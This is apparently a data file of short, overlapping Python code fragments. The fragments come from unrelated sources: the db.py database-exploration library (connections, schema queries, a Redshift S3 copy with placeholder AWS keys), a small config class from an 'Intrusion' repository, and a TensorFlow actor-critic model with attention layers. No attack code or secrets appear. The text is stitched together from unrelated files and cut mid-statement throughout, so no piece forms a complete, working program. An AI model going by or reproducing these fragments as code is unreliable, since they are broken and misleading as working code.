"self.schemas = creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else: raise Exception(\"Credentials not", "the foreign/ref key query by doing it one time, database-wide, if query is", "TODO: maybe add warnings? 
try: import psycopg2 as pg HAS_PG = True except", "((self.username and self.password) and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password ) ) or", "from s3 to redshfit...\") sql = \"\"\" copy {name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}'", "tuple is the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for rel in", "= [] for table in self.tables: for col in vars(table): if glob.fnmatch.fnmatch(col, search):", "schema. This will take a second...\") rows_to_insert = [] tables = [row[0] for", "| ArtistId, Name | +--------+--------------------------+ >>> results = db.find_table(\"tmp*\") # returns all tables", "search): \"\"\" Aggresively search through your database's schema for a table. Parameters -----------", "| Address | NVARCHAR(70) | | Employee | Address | NVARCHAR(70) | |", "don't have to save them in script. Parameters ---------- profile: str (optional) identifier/name", "bool Whether or not \"UNION ALL\" handlebars templates. This will return any handlebars", "Pulls your database's schema again and looks for any new tables and columns.", "{u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432, u'username':", "that hooks up to the Chinook DB See http://chinookdatabase.codeplex.com/ for more info. \"\"\"", "= '<KEY>' % (i, i + chunk_size) k.set_metadata('parent', 'db.py') out = StringIO() with", "| AlbumId, Title, ArtistId | | Artist | ArtistId, Name | +--------+--------------------------+ >>>", "profile. 
Profiles are stored in ~/.db.py_{profile_name} and are a base64 encoded JSON file.", "we'll create the table ONLY if it doens't exist sql = sql.replace(\"CREATE TABLE\",", "the DB.\"\"\" if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def __str__(self): return", "DB.\"\"\" if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port}", "config \"\"\" user = os.path.expanduser(\"~\") if s3: f = os.path.join(user, S3_PROFILE_ID + name)", "On You 0.99 6 Let's Get It Up 0.99 7 Inject The Venom", "dict Optional argument for handlebars-queries. Data will be passed to the template and", "S3 alternative to using keys, you can use an S3 object print_sql: bool", "list, dict Optional argument for handlebars-queries. Data will be passed to the template", "DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class DB(object): \"\"\" Utility for exploring and", "| +-----------+-------------+---------------+ | Artist | Name | NVARCHAR(120) | | Genre | Name", "naive approach if use_cache: # generate our Tables, and load them into a", "if s3: f = os.path.join(user, S3_PROFILE_ID + name) else: f = os.path.join(user, DBPY_PROFILE_ID", "= self.hostname elif hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname, self.port) else: hostname = self.hostname", "S3_PROFILE_ID + name) else: f = os.path.join(user, DBPY_PROFILE_ID + name) try: try: open(f)", "cached metadata. Please wait...\") for table in self._metadata_cache: # table metadata table_meta[table['name']] =", "only if necessary here. if bucket_location is None: bucket_location = Location.DEFAULT except ImportError:", "to include. Defaults to all. 
profile: str Preconfigured database credentials / profile for", "| +-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str): data_type = [data_type] cols = [] for", "table in self._metadata_cache: # table metadata table_meta[table['name']] = {k: table[k] for k in", "Save your database credentials so you don't have to save them in script.", "variables AWS_SECRET_KEY: str your aws secrety key. if this is None, the function", "FROM ... Album a ... INNER JOIN ... Track t ... on a.AlbumId", "try: self.con = pyo.connect(conn_str) self.cur = self.con.cursor() except: self.con = pyo.connect( driver=self.driver or", "= S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users with permission on specific buckets can use", "<NAME> 210834 8 1 <NAME>, <NAME>, <NAME> 203102 9 1 <NAME>, <NAME>, <NAME>", "to amazon, this is # much faster when it comes time to run", "pattern for what you're looking for data_type: str, list (optional) specify which data", "... {{ name }} ... GROUP BY ... table_name ... ''' >>> data", "\\COPY here. the s3 argument is a prefix, so it'll pick up #", "or INTEGERS +-------------+----------------+--------------+ | Table | Column Name | Type | +-------------+----------------+--------------+ |", "or \"localhost\", port=self.port, database=self.dbname or '', uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor() elif HAS_PYMSSQL:", "will take a second...\") rows_to_insert = [] tables = [row[0] for row in", "self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\" Pulls your database's schema again and", "schemas self.limit = limit self.keys_per_column = keys_per_column self.driver = driver if self.dbtype is" ]
[ "<reponame>LucasLaibly/Intrusion class Development(object): DEBUG: True class Testing(object): DEBUG: False class Production(object): DEBUG: False" ]
[]
[ "hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer", "self.activation_layer = Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2", "embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i", "= self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training) if self.residual: x", "# (batch_size, seq_len_q, d_model) return output, attention_weights class AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128,", "residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate)", "x, training, mask=None): cl_output = self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output,", "v, k, q, mask): batch_size = tf.shape(q)[0] q = self.wq(q) # (batch_size, seq_len,", "tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k) output = tf.matmul(attention_weights, v) # (..., seq_len_q,", "is (batch_size, num_heads, seq_len, depth) \"\"\" x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth))", "self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth) v = self.split_heads(v, batch_size) # (batch_size,", "rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, 
num_heads=8) self.dropout1 =", "scale matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits = matmul_qk / tf.math.sqrt(dk) # add", "self).__init__() self.num_heads = num_heads self.d_model = d_model assert d_model % self.num_heads == 0", "call(self, x, z, training, mask=None): z = self.embedding(z) z = self.bidirectional_lstm(z) z =", "as np def scaled_dot_product_attention(q, k, v, mask): matmul_qk = tf.matmul(q, k, transpose_b=True) #", "= embedding_out) self.dense_layer = Dense(num_policies, name='actor_output') def call(self, x, z): x = self.shared_block(x,", "padding so outputs have the same shape as inputs. padding='same') self.activation_layer = Activation('relu')", "self.layernorm1(attn_output) if not self.last: ff_output = self.dense1(x) ff_output = self.dense2(ff_output) ff_output = self.dropout2(ff_output,", "class AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1, residual=True, last=False, **kwargs):", "Dense(1, name='critic_output') def call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x) class", "= Dense(num_policies, name='actor_output') def call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x)", "z): # Critic value = self.critic(x, z) # Actor actor_output = self.actor(x, z)", "block\", rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1", "= Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual =", "last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1", "ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024, 
num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units =", "Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional import numpy as np", "v, mask) scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads,", "embedding_out = 8, actor_activation=False): super(ActorCritic, self).__init__() self.actor = Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5,", "= [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i in range(num_blocks)] self.lstm_layer = LSTM(lstm_units) def", "Transpose the result such that the shape is (batch_size, num_heads, seq_len, depth) \"\"\"", "self.actor_activation_layer = Activation('sigmoid') def call(self, x, z): # Critic value = self.critic(x, z)", "self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D(", "= actor_activation if self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def call(self, x, z): # Critic", "num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, name=\"shared block\",", "np def scaled_dot_product_attention(q, k, v, mask): matmul_qk = tf.matmul(q, k, transpose_b=True) # (...,", "num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, kernel_size=5, name=\"critic\", **kwargs): super(Critic,", "[x.shape[0], x.shape[1], z.shape[1]]) x = tf.concat([x, z], -1) for attention_block in self.attention_blocks: x", "tensorflow.keras import Model, Sequential from tensorflow.keras.layers import Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout,", "= tf.concat([x, z], -1) for attention_block in self.attention_blocks: x = attention_block(x) return 
self.lstm_layer(x)", "= self.actor(x, z) std = tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation: actor_output = self.actor_activation_layer(actor_output)", "depth) \"\"\" x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) return tf.transpose(x, perm=[0, 2,", "mask to the scaled tensor. if mask is not None: scaled_attention_logits += (mask", "num_heads): super(MultiHeadAttention, self).__init__() self.num_heads = num_heads self.d_model = d_model assert d_model % self.num_heads", "in_lstm_units, text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation", "__init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out", "num_heads self.d_model = d_model assert d_model % self.num_heads == 0 self.depth = d_model", "k = self.wk(k) # (batch_size, seq_len, d_model) v = self.wv(v) # (batch_size, seq_len,", "self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth) # scaled_attention.shape == (batch_size, num_heads, seq_len_q,", "'same' padding so outputs have the same shape as inputs. 
padding='same') self.activation_layer =", "LayerNormalization(epsilon=1e-6) self.residual = residual self.last = last def call(self, x, training, mask=None): cl_output", "num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out = 8, actor_activation=False): super(ActorCritic, self).__init__()", "+= (mask * -1e9) # softmax is normalized on the last axis (seq_len_k)", "axis=-1) # (..., seq_len_q, seq_len_k) output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v)", "tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v) return output, attention_weights class MultiHeadAttention(Layer): def __init__(self,", "attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training) if self.residual: x = self.layernorm1(x", "seq_len_q, d_model) output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model) return output, attention_weights class", "= Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual = residual self.last =", "x = self.shared_block(x, z) return self.dense_layer(x) class Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10,", "d_model) k = self.wk(k) # (batch_size, seq_len, d_model) v = self.wv(v) # (batch_size,", "**kwargs) self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters,", "Model, Sequential from tensorflow.keras.layers import Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM,", "attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k) output = tf.matmul(attention_weights, v) #", "def call(self, x, z): # Critic value = self.critic(x, z) # Actor actor_output", "k, v, mask) 
scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q,", "self.num_heads = num_heads self.d_model = d_model assert d_model % self.num_heads == 0 self.depth", "name=\"attention block\", rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8)", "tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]]) x = tf.concat([x, z], -1) for attention_block", "concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model) output = self.dense(concat_attention)", "text_lenght=5, in_lstm_units = 32, kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim,", "embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation", "def call(self, x, z, training, mask=None): z = self.embedding(z) z = self.bidirectional_lstm(z) z", "mask): matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k) # scale matmul_qk", "else: x = self.layernorm1(attn_output) if not self.last: ff_output = self.dense1(x) ff_output = self.dense2(ff_output)", "Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd", "name='critic_output') def call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x) class ActorCritic(Model):", "Actor(Layer): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, in_lstm_units", "tf.math.sqrt(dk) # add the mask to the scaled tensor. 
if mask is not", "self.layernorm2(x + ff_output) return x class SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2,", "batch_size) # (batch_size, num_heads, seq_len_q, depth) k = self.split_heads(k, batch_size) # (batch_size, num_heads,", "(batch_size, num_heads, seq_len_v, depth) # scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth) # attention_weights.shape", "the scaled tensor. if mask is not None: scaled_attention_logits += (mask * -1e9)", "z = self.embedding(z) z = self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1],", "def call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x) class ActorCritic(Model): def", "self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation if self.actor_activation: self.actor_activation_layer =", "seq_len, d_model) v = self.wv(v) # (batch_size, seq_len, d_model) q = self.split_heads(q, batch_size)", "= Dense(d_model) self.wv = Dense(d_model) self.dense = Dense(d_model) def split_heads(self, x, batch_size): \"\"\"Split", "-1, self.num_heads, self.depth)) return tf.transpose(x, perm=[0, 2, 1, 3]) def call(self, v, k,", "x.shape[1], z.shape[1]]) x = tf.concat([x, z], -1) for attention_block in self.attention_blocks: x =", "Embedding, Bidirectional import numpy as np def scaled_dot_product_attention(q, k, v, mask): matmul_qk =", "input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i in", "import Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional import numpy", "(batch_size, num_heads, seq_len_q, depth) k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth)", "= Activation('sigmoid') def 
call(self, x, z): # Critic value = self.critic(x, z) #", "BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional import numpy as np def scaled_dot_product_attention(q, k,", "**kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units", "from tensorflow.keras import Model, Sequential from tensorflow.keras.layers import Activation, Layer, Dense, Conv1D, BatchNormalization,", "= Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2 =", "= embedding_out) self.dense_layer = Dense(1, name='critic_output') def call(self, x, z): x = self.shared_block(x,", "seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention( q, k, v, mask) scaled_attention = tf.transpose(scaled_attention, perm=[0,", "call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x) class ActorCritic(Model): def __init__(self,", "seq_len, d_model) k = self.wk(k) # (batch_size, seq_len, d_model) v = self.wv(v) #", "= d_model assert d_model % self.num_heads == 0 self.depth = d_model // self.num_heads", "self.residual: x = self.layernorm1(x + attn_output) else: x = self.layernorm1(attn_output) if not self.last:", "num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out =", "num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation if self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def call(self,", "Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size, # Use 'same' padding", "= last def call(self, x, training, mask=None): cl_output = 
self.activation_layer(self.cnn_layer(x)) attn_output, _ =", "as tf import tensorflow_probability as tfp from tensorflow.keras import Model, Sequential from tensorflow.keras.layers", "hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out = 8,", "num_heads, seq_len_k, depth) v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth) #", "in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(1, name='critic_output') def call(self, x,", "(batch_size, seq_len_q, num_heads, depth) concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) # (batch_size, seq_len_q,", "class Actor(Layer): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8,", "Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional import numpy as np def scaled_dot_product_attention(q,", "LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size, # Use 'same' padding so outputs have", "self.wk = Dense(d_model) self.wv = Dense(d_model) self.dense = Dense(d_model) def split_heads(self, x, batch_size):", "= tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k) # scale matmul_qk dk =", "the shape is (batch_size, num_heads, seq_len, depth) \"\"\" x = tf.reshape(x, (batch_size, -1,", "actor_activation if self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def call(self, x, z): # Critic value", "vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(num_policies, name='actor_output') def", "vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock,", "dk = tf.cast(tf.shape(k)[-1], tf.float32) 
scaled_attention_logits = matmul_qk / tf.math.sqrt(dk) # add the mask", "def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32,", "tf import tensorflow_probability as tfp from tensorflow.keras import Model, Sequential from tensorflow.keras.layers import", "= LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size, # Use 'same' padding so outputs", "tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model) output = self.dense(concat_attention) # (batch_size,", "1. attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k) output = tf.matmul(attention_weights, v)", "LSTM, Embedding, Bidirectional import numpy as np def scaled_dot_product_attention(q, k, v, mask): matmul_qk", "\"\"\" x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) return tf.transpose(x, perm=[0, 2, 1,", "d_model) output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model) return output, attention_weights class AttentionBlock(Layer):", "ff_output = self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training) x = self.layernorm2(x + ff_output) return", "**kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out", "scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth) # attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k)", "num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, in_lstm_units = 32, text_lenght=5, kernel_size=5, name=\"actor\",", "kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, 
num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size,", "such that the shape is (batch_size, num_heads, seq_len, depth) \"\"\" x = tf.reshape(x,", "x = self.layernorm1(x + attn_output) else: x = self.layernorm1(attn_output) if not self.last: ff_output", "text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out = 8, actor_activation=False): super(ActorCritic, self).__init__() self.actor =", "num_heads, seq_len_v, depth) # scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth) # attention_weights.shape ==", "(batch_size, seq_len_q, d_model) return output, attention_weights class AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5,", "ff_output = self.dropout2(ff_output, training=training) x = self.layernorm2(x + ff_output) return x class SharedBlock(Layer):", "for i in range(num_blocks)] self.lstm_layer = LSTM(lstm_units) def call(self, x, z, training, mask=None):", "-1) for attention_block in self.attention_blocks: x = attention_block(x) return self.lstm_layer(x) class Actor(Layer): def", "num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, in_lstm_units = 32, text_lenght=5,", "def scaled_dot_product_attention(q, k, v, mask): matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q,", "add up to 1. attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k) output", "ff_output) return x class SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out", "seq_len_q, num_heads, depth) concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model)", "depth). 
Transpose the result such that the shape is (batch_size, num_heads, seq_len, depth)", "vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation if self.actor_activation: self.actor_activation_layer", "= Dense(d_model) self.wk = Dense(d_model) self.wv = Dense(d_model) self.dense = Dense(d_model) def split_heads(self,", "tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k) # scale matmul_qk dk = tf.cast(tf.shape(k)[-1],", "return self.lstm_layer(x) class Actor(Layer): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out", "last def call(self, x, training, mask=None): cl_output = self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask)", "tensor. if mask is not None: scaled_attention_logits += (mask * -1e9) # softmax", "= in_lstm_units, text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd')", "= tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation: actor_output = self.actor_activation_layer(actor_output) dist = tfp.distributions.Normal(loc=actor_output, scale=std)", "num_heads, depth) concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model) output", "= self.layernorm2(x + ff_output) return x class SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10,", "x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) return tf.transpose(x, perm=[0, 2, 1, 3])", "name='actor_output') def call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x) class Critic(Layer):", "seq_len_k) # scale matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits = matmul_qk / 
tf.math.sqrt(dk)", "import tensorflow_probability as tfp from tensorflow.keras import Model, Sequential from tensorflow.keras.layers import Activation,", "self.wv(v) # (batch_size, seq_len, d_model) q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q,", "self.attention_blocks: x = attention_block(x) return self.lstm_layer(x) class Actor(Layer): def __init__(self, num_policies, hidden_dim=1024, num_filters=128,", "Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out", "def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name,", "z = self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]]) x =", "name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5,", "/ tf.math.sqrt(dk) # add the mask to the scaled tensor. 
if mask is", "self.dropout1(attn_output, training=training) if self.residual: x = self.layernorm1(x + attn_output) else: x = self.layernorm1(attn_output)", "seq_len, d_model) q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth) k =", "= num_heads self.d_model = d_model assert d_model % self.num_heads == 0 self.depth =", "num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(1, name='critic_output')", "num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer =", "q = self.wq(q) # (batch_size, seq_len, d_model) k = self.wk(k) # (batch_size, seq_len,", "-1, self.d_model)) # (batch_size, seq_len_q, d_model) output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model)", "seq_len_q, seq_len_k) output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v) return output, attention_weights", "lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(num_policies,", "= 8, in_lstm_units = 32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block", "Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units", "same shape as inputs. 
